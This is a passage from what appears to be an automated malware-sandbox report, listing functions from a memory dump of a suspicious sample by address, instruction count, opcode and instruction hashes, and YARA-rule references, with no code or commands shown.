                                                                                                                        • Opcode Fuzzy Hash: 459c99dbf5b7950bdc0dd0aad2683d8ff5f42e8423abc94defde5cb5186f0bcd
                                                                                                                        • Instruction Fuzzy Hash: 7042D5316083419FE725CF68C890A6BFBE5BFC8700F980A2DFA8697252D771D945CB52
                                                                                                                        Function 01798158 Relevance: .6, Instructions: 617COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 56e0f5d7ffece4872d647d70f6114eb4aef8e1cf45d2bd0d9041658c602fe953
                                                                                                                        • Instruction ID: 312e2863ae7a49aa063db482e33ab72074cb74e7ae543d5709734c07d07c3468
                                                                                                                        • Opcode Fuzzy Hash: 56e0f5d7ffece4872d647d70f6114eb4aef8e1cf45d2bd0d9041658c602fe953
                                                                                                                        • Instruction Fuzzy Hash: 44426B75A102198FEF24CF69C881BADFBF5BF49310F188099E949EB242D7349985CF61
                                                                                                                        Function 01712840 Relevance: .6, Instructions: 605COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1cc0c7be7bf5bb86407ec5cf142dc9b0280d372cd04e9e9be5ddd8fdd9b589c6
                                                                                                                        • Instruction ID: 3a7a8cdfa83184117fc6d982633ba4f560aaf92cf66975b87e5eb3b4e60e602b
                                                                                                                        • Opcode Fuzzy Hash: 1cc0c7be7bf5bb86407ec5cf142dc9b0280d372cd04e9e9be5ddd8fdd9b589c6
                                                                                                                        • Instruction Fuzzy Hash: 2532CD70A007568FDB25CF69C8447BEFBFABF84704F64811DE8869B289D735A841CB50
                                                                                                                        Function 017AA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c88cb256e0fa29d12e100c0c5bce1085db11a3ed85906ed03e9ccab48f5f6116
                                                                                                                        • Instruction ID: 44df16908df9eacc75991f6da011623c352927ea33991a627fa46acbd9e6aee6
                                                                                                                        • Opcode Fuzzy Hash: c88cb256e0fa29d12e100c0c5bce1085db11a3ed85906ed03e9ccab48f5f6116
                                                                                                                        • Instruction Fuzzy Hash: D422D2706046618FEB25CF2DC094772FBF1AFC4300F98869AE9968F286D735E452DB61
                                                                                                                        Function 01706A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aa67e5ae93c5b4f9369f4a1b4ad6d3fb568bf2c1fdbd27826ee5643815de6d83
                                                                                                                        • Instruction ID: 77f5aa7bc90a689a8d9ca18bd5f684b273145f65f7fdb308d74a3ab94787b8eb
                                                                                                                        • Opcode Fuzzy Hash: aa67e5ae93c5b4f9369f4a1b4ad6d3fb568bf2c1fdbd27826ee5643815de6d83
                                                                                                                        • Instruction Fuzzy Hash: 79329B71A04705CFDB26CF68C494AAAFBF5FF88310F2485A9E956AB391D730E851CB50
                                                                                                                        Function 01724A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                        • Instruction ID: 5e35bf3877ff473b70f4e0157077d9154b153bf34e258be29665172bd93a5b06
                                                                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                        • Instruction Fuzzy Hash: 3AF15071E0022A9BDB15CFA9C594BAEFBF9BF48710F048169E906EB345E774D842CB50
                                                                                                                        Function 0179892B Relevance: .4, Instructions: 386COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 70103bcbe4dd0a593b75d3b1f350abf793d12d28d369cae98f7d11f5d3293f8d
                                                                                                                        • Instruction ID: a02f32ea91d8a7d2c6133364d307a5abc5965ee194e292e51f13fd0d58f94c29
                                                                                                                        • Opcode Fuzzy Hash: 70103bcbe4dd0a593b75d3b1f350abf793d12d28d369cae98f7d11f5d3293f8d
                                                                                                                        • Instruction Fuzzy Hash: 24D10271A0060E8BDF05CF68D841ABEF7F1AF89314F18816AD955E7241E739EA09CB61
                                                                                                                        Function 017065D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e7fc66bfa6b0c6f522860fd471b2f3204eb6d401216c85d34d7847feb4e7a602
                                                                                                                        • Instruction ID: e284a6a2757177bc9d934688a980edb9ee37728b369eeee273a03540d405f610
                                                                                                                        • Opcode Fuzzy Hash: e7fc66bfa6b0c6f522860fd471b2f3204eb6d401216c85d34d7847feb4e7a602
                                                                                                                        • Instruction Fuzzy Hash: 44E18B71608342CFC716CF28C4A4A6AFBE0BF89314F15896DF99587391EB31E915CB92
                                                                                                                        Function 016F8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7bdadebf4e677bf9223cc9f3bd736b149512c38a304354d6aa306fff85f471e3
                                                                                                                        • Instruction ID: f1835bc9268affb6abaee793a03b942f1c4d5fa4ec3d751cc76af5e536da7982
                                                                                                                        • Opcode Fuzzy Hash: 7bdadebf4e677bf9223cc9f3bd736b149512c38a304354d6aa306fff85f471e3
                                                                                                                        • Instruction Fuzzy Hash: 18D1E471A00206DBDB14DF68CC90BBEB7AAFF54304F15466DEA16DB280EB74E951CB60
                                                                                                                        Function 01788243 Relevance: .3, Instructions: 322COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                        • Instruction ID: 5b4d3ff1f754143469298a8e70e9b01318cc280123284851df776bb678204b07
                                                                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                        • Instruction Fuzzy Hash: 66B1AF75A40609AFDF24EF98C944FABFBB9BF84304F90446DAA02D7795DA30E905CB11
                                                                                                                        Function 01710535 Relevance: .3, Instructions: 300COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                        • Instruction ID: 953b1e3b82f84b77a207cc958b39b2a0533c61b835027ac7fe873d84e55bcbb3
                                                                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                        • Instruction Fuzzy Hash: 6DB1E8316006469FDB25DB6CC854BBEFBFAAF44300F280599EA52DB289D730DD81DB50
                                                                                                                        Function 017083C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 991cb6fcbc25549a9509ec54726d4a82c56be42f33de62ea542843688ea80f88
                                                                                                                        • Instruction ID: a1b10d43f0b0da53ab6e6dbeeeabec0d28c095fe3478d7302dc320edacc382f3
                                                                                                                        • Opcode Fuzzy Hash: 991cb6fcbc25549a9509ec54726d4a82c56be42f33de62ea542843688ea80f88
                                                                                                                        • Instruction Fuzzy Hash: 7BC16670608381CFE760CF18C494BAAF7E8BF88304F54496DE98987391D775E908CB92
                                                                                                                        Function 016FC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0ba55c0aa12b24384e36899155c3f66af3c37938b9b809c49c16375a0d1fc8a7
                                                                                                                        • Instruction ID: 79448f5816294219697b69841b918cb784c6e396efe1e44da65b6157c2cda653
                                                                                                                        • Opcode Fuzzy Hash: 0ba55c0aa12b24384e36899155c3f66af3c37938b9b809c49c16375a0d1fc8a7
                                                                                                                        • Instruction Fuzzy Hash: FCB16370A002698BDB74DF58CC94BA9B7B2EF44700F0485EDD64AE7241EB70DD86CB24
                                                                                                                        Function 0172E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f6619ec4451b16bfca7b0521fd5e350748082154803c41f0eb4b9f02a54d78f2
                                                                                                                        • Instruction ID: 863c431918a10173fea06476720cdd5a5a6668c3fec9a9ece72df1565accfc36
                                                                                                                        • Opcode Fuzzy Hash: f6619ec4451b16bfca7b0521fd5e350748082154803c41f0eb4b9f02a54d78f2
                                                                                                                        • Instruction Fuzzy Hash: E5A13531E00625AFEB32DB68D858FAEFBB8FB01714F050165EE01AB285DB749D41CB91
                                                                                                                        Function 01740185 Relevance: .3, Instructions: 276COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
                                                                                                                        • Instruction ID: e4aad7cec1895816675f879136637580fb6542a4a9d733707840129f437ab6e1
                                                                                                                        • Opcode Fuzzy Hash: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
                                                                                                                        • Instruction Fuzzy Hash: DCA1BE70B016169BDB25DF69C994BAAF7B1FF44328F104129EB05DB282EB34E811CB90
                                                                                                                        Function 017D4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
                                                                                                                        • Instruction ID: 2cfce50a58875c26c12542da79ee6daa0e329486426f89f546c805d041220019
                                                                                                                        • Opcode Fuzzy Hash: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
                                                                                                                        • Instruction Fuzzy Hash: EAA1C972A04206AFC722DF18C984B2AFBF9FF48754F150928F58A9BA55D330E900CB91
                                                                                                                        Function 017D2B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                        • Instruction ID: e3b1cb26fd8c096fad9c0a6de513ec7bf87c6c951d302c831bbe95e8873edc43
                                                                                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                        • Instruction Fuzzy Hash: C2B11971E0061ADFDF29CFA9C880AADFBB5FF48310F148169E915A7356D730A946CB90
                                                                                                                        Function 017860E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
                                                                                                                        • Instruction ID: 34fb5bc67ca829b6c11cf9d842d8f3aa4bd63934d1f28368715dc865de743e84
                                                                                                                        • Opcode Fuzzy Hash: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
                                                                                                                        • Instruction Fuzzy Hash: B391C071D40216BFDB15EFA8D884BAEFFB5AB48710F1541A9F610EB345D734E9009BA0
                                                                                                                        Function 0171E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 018a3655b4190f7b39df29b27a14c96bd2e28a6bfd987a02124f5eb4d1c24c06
                                                                                                                        • Instruction ID: fb26a004178b57e28be7254e8682c7229cada47b4c49f88caac38235423c3832
                                                                                                                        • Opcode Fuzzy Hash: 018a3655b4190f7b39df29b27a14c96bd2e28a6bfd987a02124f5eb4d1c24c06
                                                                                                                        • Instruction Fuzzy Hash: 08913471A00212CFEB26DB6CC884B7EFBB5EF94714F2580A9EE059B349EA34D941C751
                                                                                                                        Function 01756ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
                                                                                                                        • Instruction ID: ee77cf0acf567c60df56e83df41f5b695e3bf0619db1d25552435c864c92ab28
                                                                                                                        • Opcode Fuzzy Hash: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
                                                                                                                        • Instruction Fuzzy Hash: 2281A271E006169BDB68CF69C940ABEFBF9FB48700F54852EE845E7640E774E940CBA4
                                                                                                                        Function 017CAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                        • Instruction ID: 50559d20320d53766b0e260b6ad0a59367743853dbe85830a25623bde41758d4
                                                                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                        • Instruction Fuzzy Hash: 6C819231A0020A9FDF19CF98C894AAEFBB2FF84711F14856DD9169B349EB74E941CB40
                                                                                                                        Function 0173E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
                                                                                                                        • Instruction ID: e5a1e8641521cbd73c05cd82ab2836c37dd5263f05139c3958f1ab554f4258fc
                                                                                                                        • Opcode Fuzzy Hash: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
                                                                                                                        • Instruction Fuzzy Hash: 9A814F71A01609AFDB26CFA9C880BEEFBB9FF88354F144429E555A7251DB30AC45CB60
                                                                                                                        Function 0171C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1ed46a224f1015df1828c700d1400afc86f35b3daa40f28f944062b65074e518
                                                                                                                        • Instruction ID: c16b63643c7e9bdf6f5bd09e36b8e12c42c96dc2d13b5ae72b030ea3cb44e71e
                                                                                                                        • Opcode Fuzzy Hash: 1ed46a224f1015df1828c700d1400afc86f35b3daa40f28f944062b65074e518
                                                                                                                        • Instruction Fuzzy Hash: E871ACB5D04629DBCB26CF98D9907BEFBB4FF68710F14815AE942AB354D3709840CBA1
                                                                                                                        Function 017B47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
                                                                                                                        • Instruction ID: 9cabe81d5136d850519b89ed0125765eb21bec7d6aa6ec44821e65d6f155ece7
                                                                                                                        • Opcode Fuzzy Hash: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
                                                                                                                        • Instruction Fuzzy Hash: 44714F70900205EFDB20DF69D984B9BFBF9FF94710B10815EF616AB29AD7319A80CB54
                                                                                                                        Function 0171260B Relevance: .2, Instructions: 201COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
                                                                                                                        • Instruction ID: 99d1bedf9b3c4163c0eeb06cf2159b00ecc631b9ca2105e5542decf5b76baff8
                                                                                                                        • Opcode Fuzzy Hash: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
                                                                                                                        • Instruction Fuzzy Hash: B371CF316042428FD312DF2CC484B6AF7E5FF84710F1489AAE899CB79ADB34D946CB91
                                                                                                                        Function 0178035C Relevance: .2, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                        • Instruction ID: bd5cfff25251d3f4a39021122cf67e17fad37dda0e4090d1e5600d1f5578f8ba
                                                                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                        • Instruction Fuzzy Hash: F5716E71E40619AFDB10EFA9C944E9EFBB9FF48710F104569E505A7254DB30EA05CBA0
                                                                                                                        Function 017962A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 779a934f00c2ba065e6c8aacdde6395cd6e2da8c502bfbcfc126f7cd4bc7ff82
                                                                                                                        • Instruction ID: 808e3dd7e367092b75551fb922a73e1b381ceb74b1a4bd8a668750aad2398f97
                                                                                                                        • Opcode Fuzzy Hash: 779a934f00c2ba065e6c8aacdde6395cd6e2da8c502bfbcfc126f7cd4bc7ff82
                                                                                                                        • Instruction Fuzzy Hash: C471F332240B01AFEB32DF58D844F5AFBA6EF44760F154A28F2558B2A1D775E948CB50
                                                                                                                        Function 01708AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 28eed0c745bd21a56208f9b36ebfc4180575cc36b2e59dc97777529496321b66
                                                                                                                        • Instruction ID: 2077be0d47647c9a82108629f37936c71c968d25ce82f686d2d34bb8d17a4893
                                                                                                                        • Opcode Fuzzy Hash: 28eed0c745bd21a56208f9b36ebfc4180575cc36b2e59dc97777529496321b66
                                                                                                                        • Instruction Fuzzy Hash: 9F818D72A08706CFDB25CF9CD488BAEF7F5AB48320F1A416DD905AB286D7749D40CB94
                                                                                                                        Function 017D8324 Relevance: .2, Instructions: 192COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bc1bd777f0419019d091498fdf8bac0f4031afe8f5cc4535c20e63485976474d
                                                                                                                        • Instruction ID: 95d3018e74ff904fd6dce169ce5007e426582a79b2bceaf0da9de32df5791529
                                                                                                                        • Opcode Fuzzy Hash: bc1bd777f0419019d091498fdf8bac0f4031afe8f5cc4535c20e63485976474d
                                                                                                                        • Instruction Fuzzy Hash: 88712971E0020AAFDF16DF94C845FEEFBB8FB04350F104269F625A6294E774AA05CB91
                                                                                                                        Function 017BA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
